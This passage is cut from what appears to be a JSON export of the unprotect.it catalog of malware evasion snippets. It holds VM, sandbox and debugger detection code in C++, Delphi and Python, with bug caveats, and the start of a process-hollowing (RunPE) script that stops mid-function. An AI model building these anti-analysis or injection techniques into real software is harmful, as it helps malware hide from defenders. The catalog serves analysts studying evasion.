            "plain_code": "#include <iostream>\r\n#include <windows.h>\r\n\r\nusing namespace std;\r\n\r\n\r\nBOOL FileExists(TCHAR* szPath)\r\n{\r\n\tDWORD dwAttrib = GetFileAttributes(szPath);\r\n\treturn (dwAttrib != INVALID_FILE_ATTRIBUTES) && !(dwAttrib & FILE_ATTRIBUTE_DIRECTORY);\r\n}\r\n\r\n// Check if file related to sandbox exist\r\nint CheckFile()\r\n{\r\n    bool hAppend;\r\n    LPSTR fname[] = {\"C:\\\\ProgramData\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\StartUp\\\\agent.pyw\",\r\n                     \"C:\\\\WINDOWS\\\\system32\\\\drivers\\\\vmmouse.sys\",\r\n                     \"C:\\\\WINDOWS\\\\system32\\\\drivers\\\\vmhgfs.sys\",\r\n                     \"C:\\\\WINDOWS\\\\system32\\\\drivers\\\\VBoxMouse.sys\",\r\n                     \"C:\\\\WINDOWS\\\\system32\\\\drivers\\\\VBoxGuest.sys\",\r\n                     \"C:\\\\WINDOWS\\\\system32\\\\drivers\\\\VBoxSF.sys\",\r\n                     \"C:\\\\WINDOWS\\\\system32\\\\drivers\\\\VBoxVideo.sys\",\r\n                     \"C:\\\\WINDOWS\\\\system32\\\\vboxdisp.dll\",\r\n                     \"C:\\\\WINDOWS\\\\system32\\\\vboxhook.dll\",\r\n                     \"C:\\\\WINDOWS\\\\system32\\\\vboxmrxnp.dll\",\r\n                     \"C:\\\\WINDOWS\\\\system32\\\\vboxogl.dll\",\r\n                     \"C:\\\\WINDOWS\\\\system32\\\\vboxoglarrayspu.dll\",\r\n                     \"C:\\\\WINDOWS\\\\system32\\\\vboxoglcrutil.dll\",\r\n                     \"C:\\\\WINDOWS\\\\system32\\\\vboxoglerrorspu.dll\",\r\n                     \"C:\\\\WINDOWS\\\\system32\\\\vboxoglfeedbackspu.dll\",\r\n                     \"C:\\\\WINDOWS\\\\system32\\\\vboxoglpackspu.dll\",\r\n                     \"C:\\\\WINDOWS\\\\system32\\\\vboxoglpassthroughspu.dll\",\r\n                     \"C:\\\\WINDOWS\\\\system32\\\\vboxservice.exe\",\r\n                     \"C:\\\\WINDOWS\\\\system32\\\\vboxtray.exe\",\r\n                     \"C:\\\\WINDOWS\\\\system32\\\\VBoxControl.exe\",\r\n                     
// ADD YOUR FILE HERE!\r\n                    };\r\n\r\n    for (int i = 0; i < (sizeof(fname) / sizeof(LPSTR)); i++)\r\n    {\r\n\r\n        if (FileExists(fname[i]))\r\n            cout << \" [+] File exist: \" << (fname[i]) << endl;\r\n\t\telse\r\n            cout << \" [-] File doesn't exist: \" << (fname[i]) << endl;\r\n\r\n    }\r\n\r\n    return 0;\r\n}\r\n\r\n\r\nint main()\r\n{\r\n    CheckFile();\r\n    return 0;\r\n}"
        },
        {
            "language": "https://search.unprotect.it/api/snippet_languages/1/",
            "author": "https://search.unprotect.it/api/snippet_authors/1/",
            "technique": "https://search.unprotect.it/api/techniques/67/",
            "description": "You can build this snippet as a classic Delphi console application and add your own signatures for detecting debuggers and related tools. Two caveats when reusing it: `Locate_EnumWindows` is declared as a Boolean function but never assigns its result, and `Found` neither closes the handle returned by `OpenProcess` nor frees `pImagePath` when `GetModuleFileNameExW` returns 0, so both leak on that path.",
            "plain_code": "program FindWindowAPI;\r\n\r\n{$APPTYPE CONSOLE}\r\n\r\nuses\r\n  System.SysUtils, WinAPI.Windows, Generics.Collections, psAPI;\r\n\r\n{+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\r\n  TFindWindowSignature Class\r\n+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++}\r\n\r\ntype\r\n  TFindWindowSignature = class\r\n  private\r\n    FDescription : String;\r\n    FClassName   : String;\r\n    FWindowName  : String;\r\n  public\r\n    {@C}\r\n    constructor Create(ADescription, AClassName, AWindowName : String);\r\n\r\n    {@G}\r\n    property Description : String read FDescription;\r\n    property ClassName   : String read FClassName;\r\n    property WindowName  : String read FWindowName;\r\n  end;\r\n\r\n{-------------------------------------------------------------------------------\r\n  ___constructor\r\n-------------------------------------------------------------------------------}\r\nconstructor TFindWindowSignature.Create(ADescription, AClassName, AWindowName : String);\r\nbegin\r\n  FDescription := ADescription;\r\n  FClassName   := AClassName;\r\n  FWindowName  := AWindowName;\r\nend;\r\n\r\n{+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\r\n  Main\r\n+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++}\r\n\r\nvar LFindWindowSignatures  : TObjectList<TFindWindowSignature>;\r\n    LEnumWindowsSignatures : TDictionary<String, String>;\r\n\r\n{-------------------------------------------------------------------------------\r\n  When a Window handle is found it will output to console several information\r\n  about spotted process.\r\n-------------------------------------------------------------------------------}\r\nprocedure Found(ADescription : String; AHandle : THandle);\r\nconst CRLF = #13#10;\r\n\r\nvar AStdout_TXT    : String;\r\n    AProcessId     : Cardinal;\r\n    AProcessHandle : THandle;\r\n    ARet    
       : DWORD;\r\n    pImagePath     : PWideChar;\r\nbegin\r\n  try\r\n      AStdout_TXT := AStdout_TXT + StringOfChar('-', 60) + CRLF;\r\n      AStdout_TXT := AStdout_TXT + ADescription + CRLF;\r\n      AStdout_TXT := AStdout_TXT + StringOfChar('-', 60) + CRLF;\r\n\r\n      AStdout_TXT := AStdout_TXT + Format('Handle: %d%s', [AHandle, CRLF]);\r\n\r\n      GetWindowThreadProcessId(AHandle, @AProcessId);\r\n\r\n      if (AProcessId > 0) then begin\r\n        AProcessHandle := OpenProcess(\r\n                                        (PROCESS_QUERY_INFORMATION or PROCESS_VM_READ),\r\n                                        False,\r\n                                        AProcessId\r\n        );\r\n\r\n        if (AProcessHandle > 0) then begin\r\n          AStdout_TXT := AStdout_TXT + Format('Process Id: %d%s', [AProcessId, CRLF]);\r\n\r\n          pImagePath := nil;\r\n          try\r\n              GetMem(pImagePath, (MAX_PATH * 2));\r\n              ARet := GetModuleFileNameExW(AProcessHandle, 0, pImagePath, (MAX_PATH * 2));\r\n              if (ARet > 0) then begin\r\n                AStdout_TXT := AStdout_TXT + Format('Process Name: %s%s', [ExtractFileName(String(pImagePath)), CRLF]);\r\n                AStdout_TXT := AStdout_TXT + Format('Image Path: %s%s', [ExtractFilePath(String(pImagePath)), CRLF]);\r\n              end;\r\n          finally\r\n            if Assigned(pImagePath) and (ARet > 0) then\r\n              FreeMem(pImagePath, ARet);\r\n          end;\r\n        end;\r\n      end;\r\n\r\n      AStdout_TXT := AStdout_TXT + StringOfChar('-', 60) + CRLF + CRLF;\r\n\r\n      ///\r\n  finally\r\n    WriteLn(AStdout_TXT);\r\n  end;\r\nend;\r\n\r\n{-------------------------------------------------------------------------------\r\n  Find Debuggers by Window Name or Class Name using FindWindow API\r\n-------------------------------------------------------------------------------}\r\nfunction Locate_FindWindow() : Boolean;\r\nvar AFindWindowSignature : 
TFindWindowSignature;\r\n    i                    : Integer;\r\n    pClassName           : Pointer;\r\n    pWindowName          : Pointer;\r\n    AHandle              : THandle;\r\nbegin\r\n  result := False;\r\n  ///\r\n\r\n  for i := 0 to LFindWindowSignatures.Count -1 do begin\r\n    AFindWindowSignature := LFindWindowSignatures.Items[i];\r\n    if NOT Assigned(AFindWindowSignature) then\r\n      continue;\r\n    ///\r\n\r\n    pClassName  := nil;\r\n    pWindowName := nil;\r\n\r\n    if NOT AFindWindowSignature.ClassName.isEmpty then\r\n      pClassName := PWideChar(AFindWindowSignature.ClassName);\r\n\r\n    if NOT AFindWindowSignature.WIndowName.isEmpty then\r\n      pWindowName := PWideChar(AFindWindowSignature.WindowName);\r\n\r\n    AHandle := FindWindowW(pClassName, pWindowName);\r\n    if (AHandle > 0) then begin\r\n      Found(AFindWindowSignature.Description, AHandle);\r\n\r\n      ///\r\n      result := True;\r\n    end;\r\n  end;\r\nend;\r\n\r\n{-------------------------------------------------------------------------------\r\n  Find Debuggers by Window Name (via Window Name Pattern) using EnumWindows API\r\n-------------------------------------------------------------------------------}\r\nfunction EnumWindowProc(AHandle : THandle; AParam : LPARAM) : BOOL; stdcall;\r\nvar AMaxCount   : Integer;\r\n    AWindowName : String;\r\n    AOldLen     : Cardinal;\r\n    APattern    : String;\r\n    AKey        : String;\r\nbegin\r\n  result := True;\r\n  ///\r\n\r\n  if (AHandle = 0) then\r\n    Exit();\r\n  ///\r\n\r\n  AMaxCount := GetWindowTextLength(AHandle) + 1;\r\n  if (AMaxCount = 0) then\r\n    Exit();\r\n\r\n  SetLength(AWindowName, AMaxCount); // Other technique instead of using GetMem / FreeMem a new Pointer.\r\n  try\r\n      if (GetWindowTextW(AHandle, PWideChar(AWindowName), AMaxCount) = 0) then\r\n        Exit();\r\n      ///\r\n\r\n      AOldLen := Length(AWindowName);\r\n\r\n      for AKey {Description} in LEnumWindowsSignatures.keys do 
begin\r\n        if NOT LEnumWindowsSignatures.TryGetValue(AKey, APattern) then\r\n          continue;\r\n\r\n        AWindowName := StringReplace(AWindowName, APattern, '', []);\r\n\r\n        if (Length(AWindowName) <> AOldLen) then begin\r\n          Found(AKey, AHandle);\r\n\r\n          break;\r\n        end;\r\n      end;\r\n  finally\r\n    SetLength(AWindowName, 0);\r\n  end;\r\nend;\r\n\r\nfunction Locate_EnumWindows() : Boolean;\r\nbegin\r\n  EnumWindows(@EnumWindowProc, 0);\r\nend;\r\n\r\n{-------------------------------------------------------------------------------\r\n  Append FindWindow Technique Signature\r\n-------------------------------------------------------------------------------}\r\nprocedure AppendFindWindowSignature(ADescription, AClassName, AWindowName : String);\r\nvar AFindWindowSignature : TFindWindowSignature;\r\nbegin\r\n  if NOT Assigned(LFindWindowSignatures) then\r\n    Exit();\r\n  ///\r\n\r\n  AFindWindowSignature := TFindWindowSignature.Create(ADescription, AClassName, AWindowName);\r\n\r\n  LFindWindowSignatures.Add(AFindWindowSignature);\r\nend;\r\n\r\n{-------------------------------------------------------------------------------\r\n  ___entry\r\n-------------------------------------------------------------------------------}\r\nbegin\r\n  try\r\n    LFindWindowSignatures := TObjectList<TFindWindowSignature>.Create();\r\n    LEnumWindowsSignatures := TDictionary<String, String>.Create();\r\n    try\r\n      {\r\n        Configure debuggers signatures here for FindWindow API technique.\r\n      }\r\n      AppendFindWindowSignature('OllyDbg', 'OLLYDBG', '');\r\n      AppendFindWindowSignature('x64dbg (x64)', '', 'x64dbg');\r\n      AppendFindWindowSignature('x32dbg (x32)', '', 'x32dbg');\r\n\r\n      // ...\r\n      // AppendFindWindowSignature('...', '...', '...');\r\n      // ...\r\n\r\n      {\r\n        Configure debuggeers signatures here for EnumWindows API technique.\r\n      }\r\n      
LEnumWindowsSignatures.Add('Immunity Debugger', 'Immunity Debugger');\r\n\r\n      // ...\r\n      // AEnumWindowsSignatures.Add('...', '...');\r\n      // ...\r\n\r\n      {\r\n        Fire !!!\r\n      }\r\n      Locate_FindWindow();\r\n      Locate_EnumWindows();\r\n\r\n      readln;\r\n    finally\r\n      if Assigned(LFindWindowSignatures) then\r\n        FreeAndNil(LFindWindowSignatures);\r\n\r\n      if Assigned(LEnumWindowsSignatures) then\r\n        FreeAndNil(LEnumWindowsSignatures);\r\n    end;\r\n  except\r\n    on E: Exception do\r\n      Writeln(E.ClassName, ': ', E.Message);\r\n  end;\r\n\r\nend."
        },
        {
            "language": "https://search.unprotect.it/api/snippet_languages/2/",
            "author": "https://search.unprotect.it/api/snippet_authors/2/",
            "technique": "https://search.unprotect.it/api/techniques/19/",
            "description": "",
            "plain_code": "#include <iostream>\r\n\r\nusing namespace std;\r\n\r\nvoid smsw()\r\n{\r\n\tunsigned int reax = 0;\r\n\r\n\t__asm\r\n\t{\r\n\t\tmov eax, 0xCCCCCCCC\r\n\t\tsmsw eax\r\n\t\tmov DWORD PTR[reax], eax\r\n\t}\r\n\r\n\tif ((((reax >> 24) & 0xFF) == 0xcc) && (((reax >> 16) & 0xFF) == 0xcc))\r\n\t{\r\n\t    cout << \"VM detected!\" << endl;\r\n\t}\r\n}\r\n\r\nint main()\r\n{\r\n    smsw();\r\n    cout << \"Hello world!\" << endl;\r\n    return 0;\r\n}"
        },
        {
            "language": "https://search.unprotect.it/api/snippet_languages/2/",
            "author": "https://search.unprotect.it/api/snippet_authors/3/",
            "technique": "https://search.unprotect.it/api/techniques/7/",
            "description": "Source: https://gist.github.com/kooroshh/e4a303368555ea57f04f87e5630147b5. Caveat: `a` and `b` are never initialised, so when the `in` instruction raises an exception (the case the `__except` handler exists for) the `a == 'VMXh'` comparison reads uninitialised stack values; initialise both to 0 before the `__try` block.",
            "plain_code": "void CheckVM(void)\r\n{\r\n\tunsigned int    a, b;\r\n\r\n\t__try {\r\n\t\t__asm {\r\n\r\n\t\t\t// save register values on the stack\r\n\t\t\tpush eax\r\n\t\t\tpush ebx\r\n\t\t\tpush ecx\r\n\t\t\tpush edx\r\n\r\n\t\t\t// perform fingerprint\r\n\t\t\tmov eax, 'VMXh' // VMware magic value (0x564D5868)\r\n\t\t\tmov ecx, 0Ah // special version cmd (0x0a)\r\n\t\t\tmov dx, 'VX' // special VMware I/O port (0x5658)\r\n\r\n\t\t\tin eax, dx // special I/O cmd\r\n\r\n\t\t\tmov a, ebx // data \r\n\t\t\tmov b, ecx // data (eax gets also modified\r\n\r\n\t\t\t// restore register values from the stack\r\n\t\t\tpop edx\r\n\t\t\tpop ecx\r\n\t\t\tpop ebx\r\n\t\t\tpop eax\r\n\t\t}\r\n\t}\r\n\t__except (EXCEPTION_EXECUTE_HANDLER) {}\r\n\r\n\tif (a == 'VMXh') { // is the value equal to the VMware magic value?\r\n\t\tprintf(\"Result  : VMware detected\\nVersion : \");\r\n\t\tif (b == 1)\r\n\t\t\tprintf(\"Express\\n\\n\");\r\n\t\telse if (b == 2)\r\n\t\t\tprintf(\"ESX\\n\\n\");\r\n\t\telse if (b == 3)\r\n\t\t\tprintf(\"GSX\\n\\n\");\r\n\t\telse if (b == 4)\r\n\t\t\tprintf(\"Workstation\\n\\n\");\r\n\t\telse\r\n\t\t\tprintf(\"unknown version\\n\\n\");\r\n\t}\r\n\telse\r\n\t\tprintf(\"Result  : Not Detected\\n\\n\");\r\n}"
        },
        {
            "language": "https://search.unprotect.it/api/snippet_languages/3/",
            "author": "https://search.unprotect.it/api/snippet_authors/2/",
            "technique": "https://search.unprotect.it/api/techniques/34/",
            "description": "Python 2 snippet (uses the `print` statement) that reads the total size of a drive with `GetDiskFreeSpaceExW`. The call's return value is stored in `success` but never checked, so a failed call silently reports a size of 0B.",
            "plain_code": "import ctypes\r\nimport math\r\n\r\n# Convert octets\r\ndef convert_size(size_bytes):\r\n    if size_bytes == 0:\r\n        return \"0B\"\r\n    size_name = (\"B\", \"KB\", \"MB\", \"GB\", \"TB\", \"PB\", \"EB\", \"ZB\", \"YB\")\r\n    i = int(math.floor(math.log(size_bytes, 1024)))\r\n    p = math.pow(1024, i)\r\n    s = round(size_bytes / p, 2)\r\n    return \"%s %s\" % (s, size_name[i])\r\n\r\n\r\n# Get disk size with API GetDiskFreeSpaceExW\r\ndef disk_size(path):\r\n    PULARGE_INTEGER = ctypes.POINTER(ctypes.c_ulonglong)\r\n    kernel32 = ctypes.WinDLL('kernel32', use_last_error=True)\r\n    kernel32.GetDiskFreeSpaceExW.argtypes = (ctypes.c_wchar_p,) + (PULARGE_INTEGER,) * 3\r\n\r\n    _, total, free = ctypes.c_ulonglong(), ctypes.c_ulonglong(), ctypes.c_ulonglong()\r\n    success = kernel32.GetDiskFreeSpaceExW(path, ctypes.byref(_), ctypes.byref(total), ctypes.byref(free))\r\n    size = convert_size(total.value)\r\n    print \"The size of the disk is: \", size\r\n\r\n\r\nif __name__ == '__main__':\r\n    disk_size(\"C:/\")"
        },
        {
            "language": "https://search.unprotect.it/api/snippet_languages/2/",
            "author": "https://search.unprotect.it/api/snippet_authors/2/",
            "technique": "https://search.unprotect.it/api/techniques/12/",
            "description": "This snippet checks HKEY_LOCAL_MACHINE for the most common registry keys and values left by VMware, VirtualBox and QEMU guests. Note that `reg_value_exist` only reports whether the value could be read: its `lookup` argument is never compared against the value's content, `size` is passed to `RegQueryValueEx` uninitialised, the query is still attempted when `RegOpenKeyEx` fails, and no opened key is released with `RegCloseKey`.",
            "plain_code": "#include <iostream>\r\n#include<Windows.h>\r\n#include<stdio.h>\r\n\r\nusing namespace std;\r\n\r\nint reg_value_exist(HKEY hKey, char * regkey_s, char * value_s, char * lookup) {\r\n\tHKEY regkey;\r\n\tLONG ret;\r\n\tDWORD size;\r\n\tchar value[1024];\r\n\r\n\r\n\tif (RegOpenKeyEx(hKey, regkey_s, 0, KEY_READ, &regkey))\r\n    {\r\n        if (RegQueryValueEx(regkey, value_s, NULL, NULL, (BYTE*)value, &size))\r\n        {\r\n            cout << \" [-] Reg value doesn't exist: \" << (regkey) << endl;\r\n        }\r\n        else\r\n        {\r\n            cout << \" [*] Reg value exist: \" << (value) << endl;\r\n        }\r\n\t}\r\n\r\n    else\r\n    {\r\n        if (RegQueryValueEx(regkey, value_s, NULL, NULL, (BYTE*)value, &size))\r\n        {\r\n            cout << \" [-] Reg value doesn't exist: \" << (regkey) << endl;\r\n        }\r\n        else\r\n        {\r\n            cout << \" [*] Reg value exist: \" << (value) << endl;\r\n        }\r\n    }\r\n}\r\n\r\nint RegistryArtifacts()\r\n{\r\n    HKEY hKey;\r\n\r\n    // list of registry key related virutal machines\r\n    LPCTSTR RegValuePath[] = { \"HARDWARE\\\\DEVICEMAP\\\\Scsi\\\\Scsi Port 0\\\\Scsi Bus 0\\\\Target Id 0\\\\Logical Unit Id 0\",\r\n                               \"HARDWARE\\\\DEVICEMAP\\\\Scsi\\\\Scsi Port 1\\\\Scsi Bus 0\\\\Target Id 0\\\\Logical Unit Id 0\",\r\n                               \"HARDWARE\\\\DEVICEMAP\\\\Scsi\\\\Scsi Port 2\\\\Scsi Bus 0\\\\Target Id 0\\\\Logical Unit Id 0\",\r\n                               \"SOFTWARE\\\\VMware, Inc.\\\\VMware Tools\",\r\n                               \"HARDWARE\\\\Description\\\\System\",\r\n                               \"SOFTWARE\\\\Oracle\\\\VirtualBox Guest Additions\",\r\n                               \"SYSTEM\\\\ControlSet001\\\\Services\\\\Disk\\\\Enum\",\r\n                               \"HARDWARE\\\\ACPI\\\\DSDT\\\\VBOX__\",\r\n                               
\"HARDWARE\\\\ACPI\\\\FADT\\\\VBOX__\",\r\n                               \"HARDWARE\\\\ACPI\\\\RSDT\\\\VBOX__\",\r\n                               \"SYSTEM\\\\ControlSet001\\\\Services\\\\VBoxGuest\",\r\n                               \"SYSTEM\\\\ControlSet001\\\\Services\\\\VBoxMouse\",\r\n                               \"SYSTEM\\\\ControlSet001\\\\Services\\\\VBoxService\",\r\n                               \"SYSTEM\\\\ControlSet001\\\\Services\\\\VBoxSF\",\r\n                               \"SYSTEM\\\\ControlSet001\\\\Services\\\\VBoxVideo\",\r\n                               };\r\n\r\n\r\n    for (int i = 0; i < (sizeof(RegValuePath) / sizeof(LPCWSTR)); i++)\r\n    {\r\n\r\n        if (RegOpenKeyEx(HKEY_LOCAL_MACHINE, RegValuePath[i], 0, KEY_READ, &hKey))\r\n        {\r\n            cout << \" [-] Reg key doesn't exist: \" << (RegValuePath[i]) << endl;\r\n        }\r\n        else\r\n        {\r\n            cout << \" [*] Reg key exist: \" << (RegValuePath[i]) << endl;\r\n        }\r\n\r\n    }\r\n\r\n    // Check for registry Value\r\n    reg_value_exist(HKEY_LOCAL_MACHINE, \"HARDWARE\\\\DEVICEMAP\\\\Scsi\\\\Scsi Port 0\\\\Scsi Bus 0\\\\Target Id 0\\\\Logical Unit Id 0\", \"Identifier\", \"VMware\");\r\n    reg_value_exist(HKEY_LOCAL_MACHINE, \"HARDWARE\\\\DEVICEMAP\\\\Scsi\\\\Scsi Port 1\\\\Scsi Bus 0\\\\Target Id 0\\\\Logical Unit Id 0\", \"Identifier\", \"VMware\");\r\n    reg_value_exist(HKEY_LOCAL_MACHINE, \"HARDWARE\\\\DEVICEMAP\\\\Scsi\\\\Scsi Port 2\\\\Scsi Bus 0\\\\Target Id 0\\\\Logical Unit Id 0\", \"Identifier\", \"VMware\");\r\n    reg_value_exist(HKEY_LOCAL_MACHINE, \"HARDWARE\\\\DEVICEMAP\\\\Scsi\\\\Scsi Port 0\\\\Scsi Bus 0\\\\Target Id 0\\\\Logical Unit Id 0\", \"Identifier\", \"VBOX\");\r\n    reg_value_exist(HKEY_LOCAL_MACHINE, \"HARDWARE\\\\Description\\\\System\", \"SystemBiosVersion\", \"VBOX\");\r\n    reg_value_exist(HKEY_LOCAL_MACHINE, \"HARDWARE\\\\Description\\\\System\", \"VideoBiosVersion\", \"VIRTUALBOX\");\r\n    
reg_value_exist(HKEY_LOCAL_MACHINE, \"HARDWARE\\\\DESCRIPTION\\\\System\", \"SystemBiosDate\", \"06/23/99\");\r\n    reg_value_exist(HKEY_LOCAL_MACHINE, \"HARDWARE\\\\DEVICEMAP\\\\Scsi\\\\Scsi Port 0\\\\Scsi Bus 0\\\\Target Id 0\\\\Logical Unit Id 0\", \"Identifier\", \"QEMU\");\r\n    reg_value_exist(HKEY_LOCAL_MACHINE, \"HARDWARE\\\\Description\\\\System\", \"SystemBiosVersion\", \"QEMU\");\r\n}\r\n\r\nint main()\r\n{\r\n    RegistryArtifacts();\r\n    return 0;\r\n}"
        },
        {
            "language": "https://search.unprotect.it/api/snippet_languages/3/",
            "author": "https://search.unprotect.it/api/snippet_authors/1/",
            "technique": "https://search.unprotect.it/api/techniques/67/",
            "description": "Feel free to edit both `fw_debuggers` and `contains_in_title` to extend the search of known debuggers. Both lists match on window class names and title text only, so a renamed or retitled debugger window will not be reported; treat a hit as a signal, not proof. Requires Python 3 (f-strings).",
            "plain_code": "import ctypes\r\nimport os\r\n\r\nfrom ctypes.wintypes import BOOL, HWND, LPARAM,\\\r\n                            LPWSTR, INT, MAX_PATH,\\\r\n                            LPDWORD, DWORD, HANDLE,\\\r\n                            HMODULE\r\n\r\n\r\ndef found(description, hwnd):\r\n    \"\"\"\r\n    When a Window handle is found it will output to console several information about spotted process.\r\n    :param description: Description of found object.\r\n    :param hwnd: Handle of found object.\r\n    \"\"\"\r\n    lpdwProcessId = ctypes.c_ulong()\r\n\r\n    output = \"-\" * 60 + \"\\r\\n\"\r\n    output += description + \"\\r\\n\"\r\n    output += \"-\" * 60 + \"\\r\\n\"\r\n\r\n    output += f\"Handle: {hwnd}\\r\\n\"\r\n\r\n    _GetWindowThreadProcessId(hwnd, ctypes.byref(lpdwProcessId))\r\n\r\n    if (lpdwProcessId is not None) and (lpdwProcessId.value > 0):\r\n        PROCESS_QUERY_INFORMATION = 0x0400\r\n        PROCESS_VM_READ = 0x0010\r\n\r\n        procHandle = ctypes.windll.kernel32.OpenProcess(\r\n            PROCESS_QUERY_INFORMATION | PROCESS_VM_READ,\r\n            False,\r\n            lpdwProcessId.value\r\n        )\r\n\r\n        if procHandle > 0:\r\n            output += f\"Process Id: {lpdwProcessId.value}\\r\\n\"\r\n\r\n            lpFilename = ctypes.create_unicode_buffer(MAX_PATH)\r\n\r\n            if _GetModuleFileNameEx(procHandle, 0, lpFilename, MAX_PATH) > 0:\r\n                path, process_name = os.path.split(lpFilename.value)\r\n\r\n                output += f\"Process Name: {process_name}\\r\\n\"\r\n                output += f\"Image Path: {path}\\r\\n\"\r\n\r\n            ctypes.windll.kernel32.CloseHandle(procHandle)\r\n\r\n    output += \"-\" * 60 + \"\\r\\n\\r\\n\"\r\n\r\n    print(output)\r\n\r\n\r\ndef enum_window_proc(hwnd, lparam):\r\n    \"\"\"\r\n    EnumWindows API CallBack\r\n    :param hwnd: Current Window Handle\r\n    :param lparam: Not used in our case\r\n    :return: Always True in our 
case\r\n    \"\"\"\r\n    if hwnd > 0:\r\n        nMaxCount = ctypes.windll.user32.GetWindowTextLengthW(hwnd)+1\r\n\r\n        if nMaxCount > 0:\r\n            lpWindowName = ctypes.create_unicode_buffer(nMaxCount)\r\n\r\n            if _GetWindowText(hwnd, lpWindowName, nMaxCount) > 0:\r\n                for description, in_title in contains_in_title:\r\n                    if in_title in lpWindowName.value:\r\n                        found(description, hwnd)\r\n\r\n    return True\r\n\r\n\r\nif __name__ == '__main__':\r\n    '''\r\n        Description | Window Class Name (lpClassName) | Window Title (lpWindowName)\r\n    '''\r\n    fw_debuggers = [\r\n        (\"OllyDbg\", \"OLLYDBG\", None),\r\n        (\"x64dbg (x64)\", None, \"x64dbg\"),\r\n        (\"x32dbg (x32)\", None, \"x32dbg\"),\r\n        # ......... #\r\n    ]\r\n\r\n    '''\r\n        Description | Text contained in debugger title.\r\n    '''\r\n    contains_in_title = [\r\n        (\"Immunity Debugger\", \"Immunity Debugger\"),\r\n        # ......... 
#\r\n    ]\r\n\r\n    # Define GetWindowThreadProcessId API\r\n    _GetWindowThreadProcessId = ctypes.windll.user32.GetWindowThreadProcessId\r\n\r\n    _GetWindowThreadProcessId.argtypes = HWND, LPDWORD\r\n    _GetWindowThreadProcessId.restype = DWORD\r\n\r\n    # Define GetModuleFileNameEx API\r\n    _GetModuleFileNameEx = ctypes.windll.psapi.GetModuleFileNameExW\r\n    _GetModuleFileNameEx.argtypes = HANDLE, HMODULE, LPWSTR, DWORD\r\n    _GetModuleFileNameEx.restype = DWORD\r\n\r\n    '''\r\n        Search for Debuggers using the FindWindowW API with ClassName /+ WindowName\r\n    '''\r\n    for description, lpClassName, lpWindowName in fw_debuggers:\r\n        handle = ctypes.windll.user32.FindWindowW(lpClassName, lpWindowName)\r\n\r\n        if handle > 0:\r\n            found(description, handle)\r\n\r\n    '''\r\n        Search for Debuggers using EnumWindows API.\r\n        We first list all Windows titles then search for a debugger title pattern.\r\n        This is useful against debuggers or tools without specific title / classname. \r\n    '''\r\n\r\n    # Define EnumWindows API\r\n    lpEnumFunc = ctypes.WINFUNCTYPE(\r\n        BOOL,\r\n        HWND,\r\n        LPARAM\r\n    )\r\n\r\n    _EnumWindows = ctypes.windll.user32.EnumWindows\r\n\r\n    _EnumWindows.argtypes = [\r\n        lpEnumFunc,\r\n        LPARAM\r\n    ]\r\n\r\n    # Define GetWindowTextW API\r\n    _GetWindowText = ctypes.windll.user32.GetWindowTextW\r\n\r\n    _GetWindowText.argtypes = HWND, LPWSTR, INT\r\n    _GetWindowText.restype = INT\r\n\r\n    # Enumerate Windows through Windows API\r\n    _EnumWindows(lpEnumFunc(enum_window_proc), 0)"
        },
        {
            "language": "https://search.unprotect.it/api/snippet_languages/3/",
            "author": "https://search.unprotect.it/api/snippet_authors/3/",
            "technique": "https://search.unprotect.it/api/techniques/88/",
            "description": "",
            "plain_code": "# Source: https://github.com/joren485/HollowProcess\r\nfrom ctypes import *\r\nfrom pefile import PE\r\nimport sys\r\n\r\nif len(sys.argv) != 3:\r\n        print \"Example: runpe.py test.exe C:\\windows\\system32\\svchost.exe\"\r\n        sys.exit()\r\n\r\n\r\npayload_exe = sys.argv[1]\r\ntarget_exe = sys.argv[2]\r\nstepcount = 1\r\n\r\n\r\nclass PROCESS_INFORMATION(Structure):\r\n\t_fields_ = [\r\n                ('hProcess', c_void_p), \r\n                ('hThread', c_void_p), \r\n                ('dwProcessId', c_ulong), \r\n                ('dwThreadId', c_ulong)]\r\n\t\r\nclass STARTUPINFO(Structure):\r\n\t_fields_ = [\r\n                ('cb', c_ulong), \r\n                ('lpReserved', c_char_p),    \r\n                ('lpDesktop', c_char_p),\r\n                ('lpTitle', c_char_p),\r\n                ('dwX', c_ulong),\r\n                ('dwY', c_ulong),\r\n                ('dwXSize', c_ulong),\r\n                ('dwYSize', c_ulong),\r\n                ('dwXCountChars', c_ulong),\r\n                ('dwYCountChars', c_ulong),\r\n                ('dwFillAttribute', c_ulong),\r\n                ('dwFlags', c_ulong),\r\n                ('wShowWindow', c_ushort),\r\n                ('cbReserved2', c_ushort),\r\n                ('lpReserved2', c_ulong),    \r\n                ('hStdInput', c_void_p),\r\n                ('hStdOutput', c_void_p),\r\n                ('hStdError', c_void_p)]\r\n\t\r\nclass FLOATING_SAVE_AREA(Structure):\r\n\t_fields_ = [\r\n                (\"ControlWord\", c_ulong),\r\n                (\"StatusWord\", c_ulong),\r\n                (\"TagWord\", c_ulong),\r\n                (\"ErrorOffset\", c_ulong),\r\n                (\"ErrorSelector\", c_ulong),\r\n                (\"DataOffset\", c_ulong),\r\n                (\"DataSelector\", c_ulong),\r\n                (\"RegisterArea\", c_ubyte * 80),\r\n                (\"Cr0NpxState\", c_ulong)]\t\r\n\t\r\nclass CONTEXT(Structure):\r\n        _fields_ = 
[\r\n                (\"ContextFlags\", c_ulong),\r\n                (\"Dr0\", c_ulong),\r\n                (\"Dr1\", c_ulong),\r\n                (\"Dr2\", c_ulong),\r\n                (\"Dr3\", c_ulong),\r\n                (\"Dr6\", c_ulong),\r\n                (\"Dr7\", c_ulong),\r\n                (\"FloatSave\", FLOATING_SAVE_AREA),\r\n                (\"SegGs\", c_ulong),\r\n                (\"SegFs\", c_ulong),\r\n                (\"SegEs\", c_ulong),\r\n                (\"SegDs\", c_ulong),\r\n                (\"Edi\", c_ulong),\r\n                (\"Esi\", c_ulong),\r\n                (\"Ebx\", c_ulong),\r\n                (\"Edx\", c_ulong),\r\n                (\"Ecx\", c_ulong),\r\n                (\"Eax\", c_ulong),\r\n                (\"Ebp\", c_ulong),\r\n                (\"Eip\", c_ulong),\r\n                (\"SegCs\", c_ulong),\r\n                (\"EFlags\", c_ulong),\r\n                (\"Esp\", c_ulong),\r\n                (\"SegSs\", c_ulong),\r\n                (\"ExtendedRegisters\", c_ubyte * 512)]\r\n\r\ndef error():\r\n        print \"[!]Error: \" + FormatError(GetLastError())\r\n        print 